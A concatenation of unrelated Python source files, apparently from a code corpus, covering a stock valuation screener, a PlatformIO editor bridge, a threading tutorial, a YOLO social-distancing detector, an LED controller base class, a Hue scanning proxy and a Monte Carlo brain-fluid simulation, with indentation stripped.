dfcontents.append("{:.2f}".format(roic_8*100)) # ROIC(8)
dfcontents.append("{:.2f}".format(fcfa_8*100)) # FCFA(8)
dfcontents.append(p_mm) # MM
dfcontents.append(ebit_ev) # EBIT/EV
dfcontents.append(gpa) # GPA
dfcontents.append(roic) # ROIC
dfcontents.append("{:.2f}".format(s_rim_price))
dfcontents.append("{:.2f}".format(((s_rim_price-current_price)/current_price)*100)+"%")
dfcontents.append("{:.2f}".format(templeton_price))
if (templeton_price > current_price):
dfcontents.append(1)
elif ((templeton_price *2) > current_price):
dfcontents.append(2)
else:
dfcontents.append(99)
dfcontents.append(p_fs)
dfcontents.append('{:.2f}%'.format(sta))
dfcontents.append('{:.2f}%'.format(snoa))
dfcontents.append(moat)
if len(dfcontents) > 0:
alldfcontents.append(dfcontents)
dfcontents = []
except Exception as e:
if e == KeyboardInterrupt:
break
else:
revisit_contents.append(stock_code)
revisit_contents.append(stock_code_name_dict[stock_code])
revisit_contents.append(str(e))
all_revisit_contents.append(revisit_contents)
revisit_contents = []
continue
result_df = pd.DataFrame(columns=columnlist, data=alldfcontents)
print(result_df)
result_file = result_file_header
result_file = result_file + now.strftime("%Y%m%d") + "_" + str(proc_num) + ".csv"
print ("result_file = {}".format(result_file))
result_df.to_csv(result_file, mode="w")
if len(all_revisit_contents) > 0 and len(all_revisit_contents[0]) > 3:
revisit_columns = ['code', 'name', 'reason']
revisit_df = pd.DataFrame(columns=revisit_columns, data=all_revisit_contents)
revisit_df.to_csv('revisit_list_'+now.strftime("%Y%m%d") + "_" + str(proc_num) +'.csv', mode="w")
def us_run_from_files(us_codes, proc_num, data_location = "./itooza/us/20200207/", result_file_header = "./result_data/us_choosen_"):
print ("proc_num = {}".format(proc_num))
stock_code_name_dict = {}
s_rim_buy = []
templeton_buy = []
alldfcontents = []
dfcontents = []
all_revisit_contents = []
revisit_contents = []
for us_code in us_codes:
try:
stock_code = us_code[0]
s_rim_price = 0
templeton_price = 0
df_investing, df_financial, current_price, ev = data_collector.read_data_from_files_us(stock_code, data_location.split('/')[-2])
print(df_investing)
print(df_financial)
ev_cf_ratio = valuator.calculate_ev_cf_ratio(ev, df_financial)
print ("EV/CashFlow = {}".format(ev_cf_ratio))
sta, snoa = valuator.calculate_sta_snoa_probm_us(df_financial)
# Get S-RIM Price
s_rim_price = valuator.s_rim_calculator_us(df_investing, expected_income_ratio, current_price)
if s_rim_price > current_price:
print ("S-RIM: BUY {}".format(stock_code))
s_rim_buy.append((stock_code, int(s_rim_price)))
else:
print ("S-RIM: DON'T BUY {}".format(stock_code))
# Get Templeton Price
templeton_price = valuator.templeton_price_calculator_us(df_investing)
if templeton_price > current_price:
print ("Templeton: Strong BUY {}".format(stock_code))
templeton_buy.append((stock_code, int(templeton_price)))
elif (templeton_price * 2) > current_price:
print ("Templeton: Consider BUY {}".format(stock_code))
templeton_buy.append((stock_code, int(templeton_price)))
else:
print ("Templeton: DON'T BUY {}".format(stock_code))
fs_score = valuator.calculate_fs_score_us(df_investing, df_financial)
if fs_score >= 7:
print ("FS score: GOOD {}".format(stock_code))
p_fs = fs_score/10
moat = valuator.is_economic_moat_us(df_investing, df_financial)
ebit_ev = valuator.get_ebit_ev_us(df_financial, ev)
gpa = valuator.get_gpa_us(df_financial)
roic = float(df_investing.loc[20][1].replace('%',''))
roa_8, roic_8, fcfa_8, p_mm = valuator.calc_economic_moat_us(df_investing, df_financial)
# Save data
df_investing.to_csv("./itooza/us/"+now.strftime("%Y%m%d")+"/"+stock_code+"_investing.csv", mode="w")
df_financial.to_csv("./itooza/us/"+now.strftime("%Y%m%d")+"/"+stock_code+"_financial.csv", mode="w")
dfcontents.append(stock_code)
dfcontents.append("{:.2f}".format(current_price))
dfcontents.append("{:.2f}".format(ev_cf_ratio)) # EV/CashFlow
dfcontents.append(df_investing.loc[1][1]) # EPS Consolidated
dfcontents.append(df_investing.loc[8][1]) # PBR
dfcontents.append(df_investing.loc[3][1]) # dividend
dfcontents.append(df_investing.loc[18][1]) # ROE
dfcontents.append("{:.2f}".format(roa_8*100)) # ROA(8)
dfcontents.append("{:.2f}".format(roic_8*100)) # ROIC(8)
dfcontents.append("{:.2f}".format(fcfa_8*100)) # FCFA(8)
dfcontents.append(p_mm) # MM
dfcontents.append(ebit_ev) # EBIT/EV
dfcontents.append(gpa) # GPA
dfcontents.append(roic) # ROIC
dfcontents.append("{:.2f}".format(s_rim_price))
dfcontents.append("{:.2f}".format(((s_rim_price-current_price)/current_price)*100)+"%")
dfcontents.append("{:.2f}".format(templeton_price))
if (templeton_price > current_price):
dfcontents.append(1)
elif ((templeton_price *2) > current_price):
dfcontents.append(2)
else:
dfcontents.append(99)
dfcontents.append(p_fs)
dfcontents.append('{:.2f}%'.format(sta))
dfcontents.append('{:.2f}%'.format(snoa))
dfcontents.append(moat)
if len(dfcontents) > 0:
alldfcontents.append(dfcontents)
dfcontents = []
except Exception as e:
if e == KeyboardInterrupt:
break
else:
revisit_contents.append(stock_code)
revisit_contents.append(str(e))
all_revisit_contents.append(revisit_contents)
revisit_contents = []
continue
result_df = pd.DataFrame(columns=columnlist, data=alldfcontents)
print(result_df)
result_file = result_file_header
result_file = result_file + now.strftime("%Y%m%d") + "_" + str(proc_num) + ".csv"
print ("result_file = {}".format(result_file))
result_df.to_csv(result_file, mode="w")
if len(all_revisit_contents) > 3:
revisit_columns = ['code', 'reason']
revisit_df = pd.DataFrame(columns=revisit_columns, data=all_revisit_contents)
revisit_df.to_csv('revisit_list_'+now.strftime("%Y%m%d") + "_" + str(proc_num) +'.csv', mode="w")
def concat_dataframes(result_file_name, cnt, result_file_header = "./result_data/us_choosen_"):
dfs = []
for proc_num in range(0, cnt):
result_file = result_file_header + now.strftime("%Y%m%d") + "_" + str(proc_num) + ".csv"
print("result_file = {}".format(result_file))
try:
df = pd.read_csv(result_file)
dfs.append(df)
except Exception as e:
print("File not opened {} with exception ({}).".format(result_file, e))
continue
result_df = pd.concat(dfs)
result_df['EBIT/EV rank'] = result_df['EBIT/EV'].rank(ascending=0)
result_df['GPA rank'] = result_df['GPA'].rank(ascending=0)
result_df['P_FP'] = (result_df['ROA(8)%'] + result_df['ROIC(8)%'] + result_df['FCFA(8)%'] + result_df['P_MM'])/4
result_df['P_FS rank'] = result_df['P_FS'].rank(ascending=0)
result_df['P_FP rank'] = result_df['P_FP'].rank(ascending=0)
result_df['QV'] = 0.5*result_df['P_FP'] + 0.5*result_df['P_FS']
result_df['QV rank'] = 0.5*result_df['P_FP rank'] + 0.5*result_df['P_FS rank']
result_df.drop(result_df.columns[[0]], axis=1, inplace=True)
result_df.to_csv(result_file_name)
def send_email(result_file_name):
# Send email based on naver email
sendEmail = "" # Need to sender's naver email address
recvEmail = "" # Need to receiver email address
password = "" # Need to naver password
smtpName = "smtp.naver.com" #smtp server address
smtpPort = 587 #smtp port
msg = MIMEMultipart()
msg['Subject'] ="[{}] Valuation Result for US Stock Market".format(now.strftime("%Y-%m-%d"))
msg['From'] = sendEmail
msg['To'] = recvEmail
text = "[{}] The calculated result is attached as {}.".format(now.strftime("%Y-%m-%d"), result_file_name)
msg.attach(MIMEText(text))
with open(result_file_name, "rb") as fil:
part = MIMEApplication(fil.read(),Name=result_file_name)
# After the file is closed
part['Content-Disposition'] = 'attachment; filename="%s"' % result_file_name.split('/')[-1]
msg.attach(part)
print(msg.as_string())
s=smtplib.SMTP(smtpName, smtpPort) # connect mail server
s.starttls() # TLS security
s.login("", password) # login
s.sendmail(sendEmail, recvEmail, msg.as_string()) # send mail with converting to string
s.close() # close smtp connection
if __name__ == "__main__":
procs = []
process_cnt = 1
stock_cnt = 6714
login_id = ""
login_passwd = ""
try:
os.makedirs("./result_data/")
print("Directory ", "./result_data/", " Created ")
except FileExistsError:
print("Directory ", "./result_data/", " Already exists")
result_file_header = "./result_data/us_choosen_"
chunk = int(stock_cnt/process_cnt)
print ("len(argv) = {}".format(len(sys.argv)))
for t in sys.argv:
print ("argv = {}".format(t))
if (len(sys.argv) >= 2):
stock_code_file = sys.argv[1]
if (len(sys.argv) >= 3):
login_id = sys.argv[2]
if (len(sys.argv) >= 4):
login_passwd = sys.argv[3]
f = open(stock_code_file, 'r')
tmp_us_codes = list(csv.reader(f))
print(len(tmp_us_codes))
print(tmp_us_codes)
us_codes = [tmp_us_codes[i * chunk:(i + 1) * chunk] for i in range((len(tmp_us_codes) + chunk - 1) // chunk )]
print(len(us_codes))
print("chunk = {}".format(chunk))
time.sleep(5)
for index in range(0, process_cnt):
proc = Process(target=us_run ,args=(us_codes[index], index, chunk, login_id, login_passwd))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
concat_dataframes(result_file_header + now.strftime("%Y%m%d") + ".csv", process_cnt, "./result_data/us_choosen_")
#send_email(result_file_header + now.strftime("%Y%m%d") + ".csv") |
pio_bridge.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import os
from glob import glob
from ..libraries import paths
from ..libraries.file import File
from ..libraries.tools import get_setting
from .command import Command
class PioBridge(Command):
def __init__(self):
super(PioBridge, self).__init__()
self.cwd = self.get_working_project_path()
def save_boards_list_async(self):
"""Save boards list async
Stores the board list file in a new thread to avoid
block the Sublime Text UI
"""
from threading import Thread
from ..libraries.thread_progress import ThreadProgress
from ..libraries.I18n import I18n
from ..beginning.install_pio import save_board_list
txt = I18n().translate('processing')
thread = Thread(target=save_board_list)
thread.start()
ThreadProgress(thread, txt, '')
def get_boards_list(self):
"""Board List
Get the json file with the list of boards and return it.
The location of the json file is defined in paths.py in the
function getBoardsFileDataPath
Returns:
json -- list of boards
"""
board_file_path = paths.getBoardsFileDataPath()
file = File(board_file_path)
boards_list = file.read_json(boards)
return boards_list
def remove_ini_environment(self, board_id):
"""Remove Environment
Removes the environments from the platformio.ini file.
It happens each time a environment/board is removed selecting it
from the list of boards (Select Board). The behavior of this
option is; if the board isn't in the configs, it will be added
if not, removed.
Arguments:
board_id {[type]} -- [description]
"""
if(self.is_initialized):
from ..libraries.readconfig import ReadConfig
file_path = self.get_ini_path()
config = ReadConfig()
config.read(file_path)
environment = 'env:' + board_id
if(config.has_section(environment)):
config.remove_section(environment)
with open(file_path, 'w') as configfile:
config.write(configfile)
def get_working_project_path(self):
"""Working Path
The working path is where platformio.ini is located
it's used each time when deviot is compiling the code
Returns:
str -- path/working_path
"""
pio_structure = self.get_structure_option()
if(pio_structure):
project_path = self.get_project_path()
if(not project_path):
return None
ini_path = self.get_ini_path()
if(ini_path):
project_path = self.get_parent_path()
return project_path
if(self.is_initialized()):
ini_path = self.get_ini_path()
working_path = os.path.dirname(ini_path)
return working_path
return self.get_temp_project_path()
def get_structure_option(self):
"""Pio Structure Option
Check if the platformio structure option is mark as
true or not
Returns:
bool -- true to keep working with platformio structure
"""
return get_setting('pio_structure', False)
|
Item53.py | """
Item 53: Use Threads for Blocking I/O, Avoid for Parallelism
"""
"""
Python threads cannot run in parallel on multiple cores because of the GIL.
Python threads can be useful since the code will appear as if multiple things
are executing at the same time.
System calls will excecute in parallel when using Python threads.
This allows you to use blocking I/O at the same time as computation.
Blocking I/O includes reading and writing to files, interacting with networks, and communicating
devices.
"""
#!/usr/bin/env PYTHONHASHSEED=1234 python3
# Reproduce book environment
import random
random.seed(1234)
import logging
from pprint import pprint
from sys import stdout as STDOUT
# Write all output to a temporary directory
import atexit
import gc
import io
import os
import tempfile
TEST_DIR = tempfile.TemporaryDirectory()
atexit.register(TEST_DIR.cleanup)
# Make sure Windows processes exit cleanly
OLD_CWD = os.getcwd()
atexit.register(lambda: os.chdir(OLD_CWD))
os.chdir(TEST_DIR.name)
def close_open_files():
everything = gc.get_objects()
for obj in everything:
if isinstance(obj, io.IOBase):
obj.close()
atexit.register(close_open_files)
# Example 1: Simple factorization function that creates a generator that yield the factors of number.
def factorize(number):
for i in range(1, number + 1):
if number % i == 0:
yield i
# Example 2: We execute factorize serially and time the process.
import time
numbers = [2139079, 1214759, 1516637, 1852285]
start = time.time()
for number in numbers:
list(factorize(number))
end = time.time()
delta = end - start
print(f'Took {delta:.3f} seconds')
# Example 3: We use threads to execute factorize "concurrently." Note that the GIL prevents this from
# being truly concurrent. There is no gain in time over a serial implementation.
from threading import Thread
class FactorizeThread(Thread):
def __init__(self, number):
super().__init__()
self.number = number
def run(self):
self.factors = list(factorize(self.number))
# Example 4: Start the "concurrent" threads.
start = time.time()
threads = []
for number in numbers:
thread = FactorizeThread(number)
thread.start()
threads.append(thread)
# Example 5: Wait for all the thread to finish (join()) and time the process.
for thread in threads:
thread.join()
end = time.time()
delta = end - start
print(f'Took {delta:.3f} seconds')
# Example 6: Threading can speed up a program if system calls are involve. System calls will release the GIL
# and allow the Python code to continue as the system call runs in a thread.
import select
import socket
def slow_systemcall():
select.select([socket.socket()], [], [], 0.1)
# Example 7: A serial example with 5 system call excecute serially.
start = time.time()
for _ in range(5):
slow_systemcall()
end = time.time()
delta = end - start
print(f'Took {delta:.3f} seconds')
# Example 8: We execute system calls in parallel an compute the "helicopter location" in Python
# while system calls run concurrently. This will save time since the GIL is released after the system call.
# Note I altered the code so to show that even with 20 system calls the program is not slowed down.
# Note that I also slowed down the helicopter location function so the Python code runs longer.
start = time.time()
threads = []
for _ in range(20):
thread = Thread(target=slow_systemcall)
thread.start()
threads.append(thread)
# Example 9: The location code here is the Python part of the program. It will run concurrently
# with the system calls. Since the system calls will run in parallel the resulting code will be about
# factor of the-number-of-system-calls faster than a serial implemation.
def compute_helicopter_location(index):
pass
for i in range(5):
compute_helicopter_location(i)
for j in range(100000): pass
sub_end = time.time()
sub_delta = sub_end - start
print(f'{i+1}th loc occurred in {sub_delta:.6f} seconds', sub_end, start)
for thread in threads:
thread.join()
end = time.time()
delta = end - start
print(f'Took {delta:.3f} seconds') |
run_bk3.py | from mylib import config, thread
from mylib.yolo import YOLO
#from mylib.mailer import Mailer
from mylib.detection import detect_people
from imutils.video import VideoStream, FPS
from scipy.spatial import distance as dist
import numpy as np
import argparse, cv2, os, time , imutils
import matplotlib.pyplot as plt
from scipy.stats import gaussian_kde
#import multiprocessing
#import queue
def main():
#q = multiprocessing.Queue()
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input", type=str, default="mylib/videos/test.mp4",
help="path to (optional) input video file")
ap.add_argument("-o", "--output", type=str, default="",
help="path to (optional) output video file")
ap.add_argument("-d", "--display", type=int, default=1,
help="whether or not output frame should be displayed")
args = vars(ap.parse_args())
labelsPath = os.path.sep.join([config.MODEL_PATH, "coco.names"])
LABELS = open(labelsPath).read().strip().split("\n")
# derive the paths to the YOLO weights and model configuration
weightsPath = os.path.sep.join([config.MODEL_PATH, "yolo-fastest.weights"])
configPath = os.path.sep.join([config.MODEL_PATH, "yolo-fastest.cfg"])
classes = ["good", "bad", "none"]
yolo = YOLO("models/yolo-fastest.cfg", "models/yolo-fastest.weights", classes)
#yolo.size = int(args.size)
yolo.size = 416
#yolo.confidence = float(args.confidence)
yolo.confidence = 0.5
colors = [(200, 200, 200), (0, 165, 255), (0, 0, 200)]
global count
count = 0
# load our YOLO object detector trained on COCO dataset (80 classes)
net = cv2.dnn.readNetFromDarknet(configPath, weightsPath)
# check if we are going to use GPU
if config.USE_GPU:
# set CUDA as the preferable backend and target
print("")
print("[INFO] Looking for GPU")
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
# determine only the *output* layer names that we need from YOLO
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
# if a video path was not supplied, grab a reference to the camera
if not args.get("input", False):
print("[INFO] Starting the live stream..")
vs = cv2.VideoCapture(config.url)
if config.Thread:
cap = thread.ThreadingClass(config.url)
time.sleep(2.0)
# otherwise, grab a reference to the video file
else:
print("[INFO] Starting the video..")
vs = cv2.VideoCapture(args["input"])
if config.Thread:
cap = thread.ThreadingClass(args["input"])
# start the FPS counter
fps = FPS().start()
#global fig ,ax1 ,frame ,px ,py
fig, ax1 = plt.subplots()
# loop over the frames from the video stream
while True:
count+=1
px = np.array([])
py = np.array([])
# read the next frame from the file
if config.Thread:
frame = cap.read()
else:
(grabbed, frame) = vs.read()
# if the frame was not grabbed, then we have reached the end of the stream
if not grabbed:
break
width, height, inference_time, mask_results = yolo.inference(frame)
# resize the frame and then detect people (and only people) in it
#frame = imutils.resize(frame, width=700)
results = detect_people(frame, net, ln,
personIdx=LABELS.index("person"))
# initialize the set of indexes that violate the max/min social distance limits
serious = set()
abnormal = set()
# ensure there are *at least* two people detections (required in
# order to compute our pairwise distance maps)
if len(results) >= 2:
for detection in mask_results:
id, name, confidence, x, y, w, h = detection
#cx = x + (w / 2)
#cy = y + (h / 2)
color = colors[id]
cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
text = "%s (%s)" % (name, round(confidence, 2))
cv2.putText(frame, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,0.5, color, 2)
# extract all centroids from the results and compute the
# Euclidean distances between all pairs of the centroids
centroids = np.array([r[2] for r in results])
D = dist.cdist(centroids, centroids, metric="euclidean")
# loop over the upper triangular of the distance matrix
for i in range(0, D.shape[0]):
for j in range(i + 1, D.shape[1]):
# check to see if the distance between any two
# centroid pairs is less than the configured number of pixels
if D[i, j] < config.MIN_DISTANCE:
# update our violation set with the indexes of the centroid pairs
serious.add(i)
serious.add(j)
# update our abnormal set if the centroid distance is below max distance limit
if (D[i, j] < config.MAX_DISTANCE) and not serious:
abnormal.add(i)
abnormal.add(j)
# loop over the results
for (i, (prob, bbox, centroid)) in enumerate(results):
# extract the bounding box and centroid coordinates, then
# initialize the color of the annotation
(startX, startY, endX, endY) = bbox
(cX, cY) = centroid
color = (200, 200, 200)
# if the index pair exists within the violation/abnormal sets, then update the color
if i in serious:
color = (50, 200, 200)
elif i in abnormal:
color = (100, 255, 255) #orange = (0, 165, 255)
# draw (1) a bounding box around the person and (2) the
# centroid coordinates of the person,
cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)
cv2.circle(frame, (cX, cY), 5, color, 2)
px = np.append(px,cX)
py = np.append(py,cY)
# draw some of the parameters
Safe_Distance = "Safe distance: >{} px".format(config.MAX_DISTANCE)
cv2.putText(frame, Safe_Distance, (470, frame.shape[0] - 25),cv2.FONT_HERSHEY_SIMPLEX, 0.60, (255, 0, 0), 2)
Threshold = "Threshold limit: {}".format(config.Threshold)
cv2.putText(frame, Threshold, (470, frame.shape[0] - 50),cv2.FONT_HERSHEY_SIMPLEX, 0.60, (255, 0, 0), 2)
# draw the total number of social distancing violations on the output frame
text = "Total serious violations: {}".format(len(serious))
cv2.putText(frame, text, (10, frame.shape[0] - 55),cv2.FONT_HERSHEY_SIMPLEX, 0.70, (0, 0, 255), 2)
text1 = "Total abnormal violations: {}".format(len(abnormal))
cv2.putText(frame, text1, (10, frame.shape[0] - 25),cv2.FONT_HERSHEY_SIMPLEX, 0.70, (0, 255, 255), 2)
if len(serious)>2 or len(abnormal)>2:
plt.ion()
plot(ax1 ,frame ,px ,py)
if args["display"] > 0:
# show the output frame
cv2.imshow("Real-Time Monitoring/Analysis Window", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# update the FPS counter
fps.update()
#simulate=multiprocessing.Process(target=plot)
#simulate.start()
# stop the timer and display FPS information
fps.stop()
print("===========================")
print("[INFO] Elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] Approx. FPS: {:.2f}".format(fps.fps()))
# close any open windows
cv2.destroyAllWindows()
#window.mainloop()
def plot(ax1 ,frame ,px ,py):
if count>1:
ax1.cla()
k = gaussian_kde(np.vstack([px, py]))
xi, yi = np.mgrid[0:frame.shape[1]:72*1j,0:frame.shape[0]:128*1j]
zi = k(np.vstack([xi.flatten(), yi.flatten()]))
ax1.contourf(xi, yi, zi.reshape(xi.shape), alpha=0.5)
ax1.set_xlim(0, frame.shape[1])
ax1.set_ylim(0, frame.shape[0])
plt.gca().invert_yaxis()
plt.show(block=False)
if __name__ == '__main__':
main() |
thread.py | #!/usr/bin/python
import threading
import time
import glob
import os
l = glob.glob("*.txt")
def loop(x):
f = file(x, 'r+')
print '%s' % ''.join(map(str,f.readlines()))
f.close()
for i in range(len(l)):
t = threading.Thread(target=loop, args = (l[i],))
t.start()
|
controller_base.py | ################################################################################
# controller_base.py
#-------------------------------------------------------------------------------
# Base class for a controller to interact with the LED display application
# framework.
#
# By Malcolm Stagg
#
# Copyright (c) 2021 SODIUM-24, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
import weakref
import threading
class ControllerBase(object):
"""
Base class to be implemented by all controllers
"""
def __init__(self, config, main_app):
"""
Initialize a controller
"""
self.config = config
self.main_app = weakref.ref(main_app)
self.controller_thread = None
self.stop_event = threading.Event()
def start(self):
"""
Start the controller running
"""
self.controller_thread = threading.Thread(target=self.run)
self.controller_thread.daemon = True
self.controller_thread.start()
def stop(self):
"""
Stop a running controller
"""
if self.controller_thread is not None:
self.stop_event.set()
self.controller_thread.join()
self.controller_thread = None
def get_state(self):
"""
Controller function to retrieve the app state
"""
return self.main_app().get_state()
def get_screen_order(self):
"""
Controller function to retrieve screen order
"""
return self.main_app().screen_order
def set_screen_order(self, screen_order):
"""
Controller function to set screen order
"""
self.main_app().screen_order = screen_order
return True
def save_screen_order(self, screen_order):
"""
Controller function to set and save screen order
"""
self.main_app().screen_order = screen_order
self.main_app().save_screen_order(self.main_app().config_directory, screen_order)
return True
def get_config(self):
"""
Controller function to retrieve configuration
"""
return self.main_app().config
def set_config(self, config):
"""
Controller function to set configuration
"""
self.main_app().config = config
self.main_app().reload_running_app()
return True
def save_config(self, config):
"""
Controller function to set and save configuration
"""
self.main_app().config = config
self.main_app().reload_running_app()
self.main_app().save_system_config(self.main_app().config_directory, config)
return True
def send_input_event(self, input_event):
"""
Controller function to inject an input event
"""
return self.main_app().on_input_event(input_event)
def send_joystick_press(self, button, button_states):
"""
Controller function to inject a joystick button press
"""
return self.main_app().on_joystick_press(button, button_states)
def send_joystick_release(self, button, button_states):
"""
Controller function to inject a joystick button release
"""
return self.main_app().on_joystick_release(button, button_states)
def send_joystick_axis(self, axis_states):
"""
Controller function to inject joystick axis data
"""
return self.main_app().on_joystick_axis(axis_states)
def enter_sleep_mode(self):
"""
Controller function to turn off the LED display
"""
self.main_app().enter_sleep_mode()
def run(self):
"""
Main controller run routine, to be implemented by the controller
"""
return
|
scanning_proxy.py | """Philips hue proxy code."""
import abc
import logging
import sys
import threading
from pi import proxy
class ScanningProxy(proxy.Proxy):
"""A proxy object with a background scan thread."""
__metaclass__ = abc.ABCMeta
def __init__(self, refresh_period):
self._refresh_period = refresh_period
self._exiting = False
self._scan_thread_condition = threading.Condition()
self._scan_thread = threading.Thread(
target=self._scan, name='%s thread' % self.__class__.__name__)
self._scan_thread.daemon = True
self._scan_thread.start()
@proxy.command
def scan(self):
with self._scan_thread_condition:
self._scan_thread_condition.notify()
def _scan(self):
"""Loop thread for scanning."""
while not self._exiting:
# We always do a scan on start up.
try:
self._scan_once()
except:
logging.error('Error during %s scan', self.__class__.__name__,
exc_info=sys.exc_info())
with self._scan_thread_condition:
if self._exiting:
break
else:
self._scan_thread_condition.wait(self._refresh_period)
logging.info('Exited %s scan thread', self.__class__.__name__)
@abc.abstractmethod
def _scan_once(self):
pass
def stop(self):
with self._scan_thread_condition:
self._exiting = True
self._scan_thread_condition.notify()
def join(self):
self._scan_thread.join()
|
monte_carlo.py | """!
@file
@date 07 Jun 2015
@license
Copyright 2015 Brett Tully
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__use_python_solver = True
if __use_python_solver:
from mpet.four_compartment import FourCompartmentMPET as MPETSolver
else:
from mpet import FourCompartmentPoro as MPETSolver
from mpet import FourCompartmentPoroOptions
from mpet import FourCompartmentPoroResult
import numpy as np
import csv
import multiprocessing as mp
class MonteCarloWorker(object):
_STOP_SIGNAL = "STOP"
def __init__(self, num_simulations=10000, blocked=False):
self._num_simulations = num_simulations
self._grid_size = 1500 # from resolution study
self._num_steps = 3 # from resolution study
secs_in_day = 86400.0
self._initial_time = 0.0
self._dt = secs_in_day / self._num_steps
self._write_transient = False
self._write_wall = False
self._debug_print = False
self._aqueduct_diameter = 0.25e-3 if blocked else 4e-3
self._base_name = "monte_carlo"
if blocked:
self._base_name += "_blocked"
self._out_filename = self._base_name + ".dat"
self._out_csvfile = None
self._num_procs = None
self._num_simulations_per_proc = None
self._run_q = None
self._out_q = None
self._out_p = None
self._run_p = None
def create_data(self, num_procs=None):
"""
Run a series of simulations. As this is embarrasingly parallel
we can use python multiprocess to compute them in parallel. The
results of a run are pushed to the output queue to be written to
file
"""
self._num_procs = mp.cpu_count() if num_procs is None else num_procs
self._num_simulations_per_proc = self._num_simulations / self._num_procs + 1
self._run_q = mp.Queue()
self._out_q = mp.Queue()
self._run_p = [mp.Process(target=self._run_all, args=()) for i in range(self._num_procs)]
self._out_p = mp.Process(target=self._output, args=())
for p in self._run_p:
p.start()
self._out_p.start()
for p in self._run_p:
p.join()
self._out_p.join()
def load_results(self):
"""
Open the output file and convert it to a numpy array ready for
analysis
"""
return np.loadtxt(self._out_filename, delimiter=',')
def _run_all(self):
"""
Runs all of the simulations, creating a unique id for each one
"""
cur_proc = mp.current_process()._identity[0] - 1
for i in range(self._num_simulations_per_proc):
sim_idx = cur_proc * self._num_simulations_per_proc + i
result = self._run(sim_idx)
self._out_q.put(result)
for i in range(self._num_procs):
self._out_q.put(self._STOP_SIGNAL)
def _output(self):
"""
Take the results from each run and save it to file
"""
with open(self._out_filename, "w") as outfile:
self._out_csvfile = csv.writer(outfile)
# Keep running until we see the stop message
for works in range(self._num_procs):
for result in iter(self._out_q.get, self._STOP_SIGNAL):
self._out_csvfile.writerow(result)
def _run(self, sim_number):
base_name = "{}_{:06d}".format(self._base_name, sim_number + 1)
print base_name
opts = FourCompartmentPoroOptions()
# arteriol constants
opts.alpha_a = np.random.uniform(0.8, 1.0)
opts.beta_a = 0.99
opts.kappa_a = 10 ** np.random.uniform(-14.0, -8.0)
opts.mu_a = 8.9e-4 * 3. # about 3 times that of water
# capillary constants
opts.alpha_c = np.random.uniform(0.8, 1.0)
opts.beta_c = 0.99
opts.kappa_c = 10 ** np.random.uniform(-14.0, -8.0)
opts.mu_c = 8.9e-4 * 3. # about 3 times that of water
opts.k_ce = 10 ** np.random.uniform(-10.0, 0.0)
# venous constants
opts.alpha_v = np.random.uniform(0.8, 1.0)
opts.beta_v = 0.99
opts.kappa_v = 10 ** np.random.uniform(-14.0, -8.0)
opts.mu_v = 8.9e-4 * 3. # about 3 times that of water
# transfer coefficients
opts.gamma_ac = 10 ** np.random.uniform(np.log10(3.0e-19), np.log10(1.0e-19))
opts.gamma_ce = 10 ** np.random.uniform(-20, np.log10(2.5e-19))
opts.gamma_cv = 10 ** np.random.uniform(-20, np.log10(2.5e-19))
opts.gamma_ev = 10 ** np.random.uniform(-13.0, -8.0)
# aqueduct diameter
opts.aqueduct_diameter = self._aqueduct_diameter
s = MPETSolver(self._grid_size,
self._initial_time,
self._num_steps,
self._dt,
self._write_transient,
self._write_wall,
self._debug_print,
base_name,
opts)
result = s.solve()
assert isinstance(result, FourCompartmentPoroResult)
return [opts.alpha_a,
opts.alpha_c,
opts.alpha_v,
opts.kappa_a,
opts.kappa_c,
opts.kappa_v,
opts.k_ce,
opts.gamma_ac,
opts.gamma_ce,
opts.gamma_cv,
opts.gamma_ev,
result.displacement,
result.pressure_art,
result.pressure_cap,
result.pressure_csf,
result.pressure_ven]
def main():
from mpl_toolkits.mplot3d import Axes3D # needed to register projection
import matplotlib.pyplot as plt
num_simulations = int(1e6)
worker = MonteCarloWorker(num_simulations=num_simulations, blocked=False)
rerun_simulations = True
if rerun_simulations:
num_procs = 3
worker.create_data(num_procs=num_procs)
results = worker.load_results()
num_params = 11
num_results = 5
assert results.shape[1] == num_params + num_results
param_names = list()
param_names.append("alpha_a")
param_names.append("alpha_c")
param_names.append("alpha_v")
param_names.append("kappa_a")
param_names.append("kappa_c")
param_names.append("kappa_v")
param_names.append("k_ce")
param_names.append("gamma_ac")
param_names.append("gamma_ce")
param_names.append("gamma_cv")
param_names.append("gamma_ev")
assert len(param_names) == num_params
result_names = list()
result_names.append("Displacement")
result_names.append("Pressure: Art")
result_names.append("Pressure: Cap")
